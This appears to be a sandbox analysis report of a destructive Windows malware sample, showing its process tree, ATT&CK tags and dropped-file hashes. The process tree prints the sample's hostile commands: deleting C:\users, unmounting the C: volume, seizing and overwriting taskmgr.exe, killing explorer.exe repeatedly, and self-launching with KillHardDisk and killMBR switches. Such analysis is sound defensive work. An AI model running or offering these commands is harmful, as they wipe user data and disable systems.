        takeown /f C:\windows\system32\taskmgr.exe
        7⤵
        Modifies file permissions
        
        PID:10940
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c Cacls C:\windows\system32\taskmgr.exe /t /e /c /gAdmin:F
        6⤵
        
        PID:13628
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe /KillHardDisk 1699084438
      4⤵
      PID:11436
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe /KillHardDisk 1699084438
        5⤵
        
        PID:7260
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c del C:\users /r /f
        6⤵
        
        PID:5416
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c mountvol c: /d
        6⤵
        
        PID:13004
        
        C:\Windows\system32\mountvol.exe
        
        mountvol c: /d
        7⤵
        
        PID:13388
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe /autoup 1699084438
      4⤵
      PID:6040
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe /killMBR 1699084438
      4⤵
      PID:8988
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe /killMBR 1699084438
        5⤵
        
        PID:6336
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe /protect 1699084438
      4⤵
      PID:7140
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe /protect 1699084438
        5⤵
        
        PID:7296
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe+817680.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a28900278.exe
        6⤵
        
        PID:8628
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe /autoup 1699084438
      4⤵
      PID:5744
    - - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe
        
        C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe /autoup 1699084438
        5⤵
        
        PID:12780
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cpoy C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe C:\windows\system32\taskmgr.exe
      4⤵
      PID:12988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy /b C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe+115878.txt C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890021.exe
  2⤵
  PID:2916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890021.exe 1699084438
  2⤵
  PID:8940
- - C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890021.exe
    C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890021.exe 1699084438
    3⤵
    PID:10076

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:7424
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:5400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
1⤵
PID:8312
- C:\Windows\system32\taskkill.exe
  taskkill /f /im explorer.exe
  2⤵
  - Kills process with taskkill
  PID:8788

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
PID:8984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8255e46f8,0x7ff8255e4708,0x7ff8255e4718
  2⤵
  PID:9016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,2179097157003139996,15569243534680388326,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1792 /prefetch:3
  2⤵
  PID:10532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
1⤵
PID:1420
- C:\Windows\system32\taskkill.exe
  taskkill /f /im explorer.exe
  2⤵
  - Kills process with taskkill
  PID:9436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
1⤵
PID:8204
- C:\Windows\system32\taskkill.exe
  taskkill /f /im explorer.exe
  2⤵
  - Kills process with taskkill
  PID:9444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
1⤵
PID:4516
- C:\Windows\system32\taskkill.exe
  taskkill /f /im explorer.exe
  2⤵
  - Kills process with taskkill
  PID:9460

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3720

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:8212

C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890032.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890032.exe 1699084438
1⤵
PID:9896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  PID:8044
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    PID:496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
1⤵
PID:4908
- C:\Windows\system32\taskkill.exe
  taskkill /f /im explorer.exe
  2⤵
  - Kills process with taskkill
  PID:5008

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
1⤵
PID:5236
- C:\Windows\system32\taskkill.exe
  taskkill /f /im explorer.exe
  2⤵
  - Kills process with taskkill
  PID:4480

C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
1⤵
- Kills process with taskkill
PID:9604

C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
1⤵
- Kills process with taskkill
PID:10188

C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
1⤵
- Kills process with taskkill
PID:7632

C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
1⤵
- Kills process with taskkill
PID:8280

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4B0A6DF67B59A0F1A726B135CFEFC113 --mojo-platform-channel-handle=1828 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
1⤵
PID:4612

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=1AD496C0F5FB929DB7BAE982E08ED21D --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=1AD496C0F5FB929DB7BAE982E08ED21D --renderer-client-id=2 --mojo-platform-channel-handle=1664 --allow-no-sandbox-job /prefetch:1
1⤵
PID:2112

C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890027.exe /autoup 1699084438
1⤵
PID:6272

C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe /autoup 1699084438
1⤵
PID:9224

C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a289002.exe /autoup 1699084438
1⤵
PID:5216

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1780

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\c8a7acb7eefb478489e10de53776b22c /t 1904 /p 1652
1⤵
PID:6536

C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890030.exe /killwindows 1699084438
1⤵
PID:7056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c takeown /f C:\windows\system32\taskmgr.exe
  2⤵
  PID:4528

C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890014.exe /autoup 1699084438
1⤵
PID:7820

C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890038.exe /autoup 1699084438
1⤵
PID:9388

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F2C770C2704BA6843DA17D922A941F36 --mojo-platform-channel-handle=2260 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
1⤵
PID:11516

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
1⤵
PID:6824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
1⤵
PID:2844

C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe /killMBR 1699084438
1⤵
PID:3488

C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe
C:\Users\Admin\AppData\Local\Temp\NEAS.5c7b45ea272a12bf5719812037a2890034.exe /KillHardDisk 1699084438
1⤵
PID:12076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c del C:\users /r /f
  2⤵
  PID:5972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c mountvol c: /d
  2⤵
  PID:6780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
b24610fd87eaa133bcfbd60e79eceba3

SHA1
a26b157e626f8adbb1ec02c1ef4374a8ed068cda

SHA256
4887288b1f4c963a86433b76f652a6d049721f5bebfa1c0ba2945a14bae00e55

SHA512
c15b5df289436348e452a11c9bb341f264c7fa88fb39ffeab301628e23b5824620fc604e19ad6d21914e80d3b3eb27524628f7439b1719cde271f19765bf4d0d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
371B

MD5
50212578324093efcf91f5d8326685c0

SHA1
a1e4c058ed133f73fde043fc64db37254f0b08eb

SHA256
2d1d4e142f59941d9d5f73ebdd1c2f9a540be1f45b3bdf481af869c7033f5ebc

SHA512
71f53aa5398a26d107ad629e949a706f7d7d22800647b2b1e0a2ff355e969fbec8dd3f493293c76daf385c5a5528aa366d931a68c0300ca0409870ebafbd8ac8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
5b9a6136228722b84af095bf5e4ea586

SHA1
a6deb9af1c5c51b600d3cee925941c981dbdd299

SHA256
59ef047efbcb1642a8006095b7c9a5352d2e2505adb9c9a7bce0b5150fce755f

SHA512
56c0f8685fe1f517d909d32830eeee250e795dc27448b92d9f8829d86492dd6839e3d79b6acb34dbdf7c9f0b0b16aac3360c30f3be475c31c14a109de8df7c1b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
8d5f7f93487b00fb97138cbb849a7fac

SHA1
c13acbf68efcfa0b4cb1ae8b04bdfe37da094039

SHA256
f71f48fb781e78213d4c2e4c40c43673a2e6be639ff9400ee66bc24425ea4969

SHA512
e86e272e3d88a825dc6fe6d28b5b161dbeb6dbcd1947bca8f5f5d17c2f1f2d57a0e19a0808f37234fdd7c88dea9cbe13f8e1b2236bbb75559534596e7c4ae56e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
f8173ad6cf9a8c48d6778ca3f93406ac

SHA1
0378eb14684c3d5ced89522594c20966109949bd

SHA256
1b4ba32ae7c52cfe3680b04ff7cdc5fedb8d6c34aee7013411a2234bec69ebee

SHA512
16fddacb3fc5e8d58010c77be4097a992d652255976b37aa8b2a95a7740f7914e4e028d025393655176146cbd77b6326685bed0e2db613a02c2ca36705cc0a12

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
f6e302fe3046223ec3db3830b539bf03

SHA1
d62c4135d8650db599da8be5c7490f0dc9d78e43

SHA256
b079a515f9db0cb4640e5587d8a642cb195441bd27d82b60cade3cb372a362ac

SHA512
d3ec2e53dba4dcc44eede40cad6830c73582851ca386e071260f3d269b64da17a8845ac4cec911a8952af7c2f036757198a9063b7f946fb47c7829dc90237b22

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
220KB

MD5
185b4a522e5ce71266bd75f65a896561

SHA1
e7be1bed079035126d24a25f8a57f4382a206f8c

SHA256
ebb0ca399f1b0bb22aca106e78a249bb7939e86aed5701df928ab2f9d2bc2b64

SHA512
c7c49f18022d59c59c9edb690e38bb43bac54af30c1ceab557dcbcb34e751c3e86aff65174626f482f6ac652f0df614e0e859dde6244c8e9e3dfc2101cca0f16

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
215KB

MD5
f4936d3ea6135980ec24c9d81320511d

SHA1
c102ad549eed349e9f8b83f5264362eb819f82f0

SHA256
912c7597a73b9dd8ef48fea14ae1c42593a13d7aaf7f43cf4d251b8031b5d488

SHA512
b8abe2cc6b905f7cb39258bbb6f6bb4b10044a3ad45cfd68a3b5f174a422704d12741ad7c5907e1a62b0df7553aebd23905283ee43c0804233270b83b7d4a9fd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
215KB

MD5
c4403b2c1d06d0999eb09cd5f614f092

SHA1
f2b3f8ba3d7e4d313c31b03614732adb4898f2d4

SHA256
a06aec39d8f94bfb399c719e378cc414e2f272cb3f40057068d4470e11fe2c03

SHA512
d930b08ff29a88d0fa0f9ec9268f37de0384e79374819b6d5cb8d94c59c6803406ad6332c5086ae7f2bd44fa0dadaf019febf6f64d1935385430067fd95c6875

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
215KB

MD5
ad2ad9cc20f5fce59df49c3003c652c8

SHA1
9f6b9adcd03f379adf98dc6609d81163aa62f922

SHA256
2f213d24a2bfb434e71590bf117b8b6fe5d80e8a54050675efece2764dd07c9c

SHA512
d704a865dc260610e23a23b8fa478e4821f143497003ad62f233a2ea27766c8e54e34937f07a7831391f84a3574f873c092abfb9f7c4b692c0242b3d3b532971

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
ff7167bd08e9204757b1642a912a7847

SHA1
56e08ff7b18ec9c6228ca6d03012deb70267fffc

SHA256
56c0d4ffe05a03d3f24b85bad32d8ca2a6582833bae48aa09d42b00190ee81d6

SHA512
411ee971392618e53c1512cf5eacff7e2bcdc9dd8e2e99b6b65a86ff073bc69e57e3e97d97c046c0df41b623b2671913db7db2f55e3b0400ed31803aaef7812c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
aed593b08b94f34dd8f68fd369652ac2

SHA1
3ce2a17e426e09c2fd9a8d2ab191fe29248f2d95

SHA256
5c0cdd5dc1bccf7e3ffa8568fdd2fe35f3edc85832f3d11331aced965aaeeba7

SHA512
16b34c29d8ea3793f7d4491847d2fecae2c6c9d7b7b1ec16d1367828d0a4da4cdbf912c2040bc0ca98ac32cd701355ddd16b4865629d51bae2527e1a05411137

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
807419ca9a4734feaf8d8563a003b048

SHA1
a723c7d60a65886ffa068711f1e900ccc85922a6

SHA256
aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631

SHA512
f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
dd3bcf486f68735f90b7c27b000c6cc2

SHA1
74be5a1bf1cd5cad0240557d60f5bf5b4f5be14d

SHA256
b117aaa4996dec577ac48cfb66a0dc3ce3cb5f1bfa9803c2e7f5fe2d5cc422d9

SHA512
0236e690b9ce10a7b695fad64a39ebce18190b9342fb1310900945cfcf5d2f9822b82500d9fca270243390dd2074c61143fd4448dc6f68d115cf3eafe63b03fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
d3f8bd9c51d25cc47da1a0c366101807

SHA1
8e09f2b9da9305c00bf2108485288d6825ed2ef5

SHA256
1e94da18027cca305451cb23a6856ea6d70434a5b02705243e40a4892e28cd6c

SHA512
7ef0fa11827e295c86ce01b0331fdc670c255c22cab028a1fa4828404167859532539b70061db736e132b8e87cfc5d6f63b4fe21cc4a0f84f9231f0b35311c4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
e2565e589c9c038c551766400aefc665

SHA1
77893bb0d295c2737e31a3f539572367c946ab27

SHA256
172017da29bce2bfe0c8b4577a9b8e7a97a0585fd85697f51261f39b28877e80

SHA512
5a33ce3d048f2443c5d1aee3922693decc19c4d172aff0b059b31af3b56aa5e413902f9a9634e5ee874b046ae63a0531985b0361467b62e977dcff7fc9913c4d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
3KB

MD5
b2309749165358ef5dcbc11229b1377d

SHA1
0d40fa32fa660df66426bf1971033a6dbc33b61d

SHA256
7690f7d51ab5ac85d8b389bb5bb255b82926f682a4006e6a4c0adc1fb8440bfe

SHA512
dd1f27721e080fea17232309e69c4fd674a09bad0614422c7b663cbe8457442afa82c297ef67ce72f345a6b0c77a35af594b3dce5a8e8d7298181cd1be78c3eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
6d0a23e9415922b81014c8bcefb20ee6

SHA1
c9043c1b5aa96b296f67c49c814b5db910cc2d57

SHA256
11d914154c2720a3eb6336e80c1a0c43aed8a49d411eb880bca6317d9b58a116

SHA512
c40a78132e4f90e7e5a5469e9e7ee8d2a3753ccb190787001b48cfb82b9c8783842b16ceb598d926a16c0d549759595cf59ecb07c1f4393f2159115df80a407a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
bb8318eb9889855c8746357c7d4a1cf7

SHA1
f469852d44f2f64534b874c20528208972fbfa91

SHA256
5f9f4f852dc3d55715154bf234e91f2336ff8aaf4c9f617c413a44b0954d5690

SHA512
2e475fac31135f7bc658d8f9d613d7b01bff07ba189a63a5870e7d03b7de73195b48619d7723a1fd39fe3fe2eb996fee1b651403da6ebbde5bbd4e66f0006492

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ppqxj052.default-release\activity-stream.discovery_stream.json.tmp

Filesize
22KB

MD5
949290b1fdc7498f31d693686fa9db98

SHA1
1be443fee6673d7c8161b27eced58a230edd4871

SHA256
c33e7009bb1e36626626b3de3f76581d139638703990cd62e1d6b67812c547a4

SHA512
06dadb2cccba7258296f0fdb351a5e1eea4133df31b9dd446086ec932f32578f0bc970f7585b3c122b4fdba4c81e7fb8d2dbce7cf7238a56a24d7bae0e817343

Download Submit
C:\Users\Admin\AppData\Local\Temp\022615.txt

Filesize
5B

MD5
bc3fb8a4b6e4a83feb535917ce574d31

SHA1
0b90dacacb7307291ab6092a5862896f04d245f8

SHA256
e6f9e741b32f2272d844f5794182b04787bfab22a4e4608b882cee8589a3cd0e

SHA512
ec2613f85411895fed8fc33b6758b1726c577f66a0c9411ebdb0b6a6f70df29fb705090fe46b6d7411ea3e053743e72b060ee319f8ccfc0e6f323c980e038eb5

Download Submit
C:\Users\Admin\AppData\Local\Temp\032396.txt

Filesize
4B

MD5
dd03de08bfdff4d8ab01117276564cc7

SHA1
0f3e894dadc0e584feb3fede35662f24cc63247b

SHA256
5ec68887c118ee1b9f6008b1441df4ffe0a31cdbbe17ffe46e06f4920624233d

SHA512
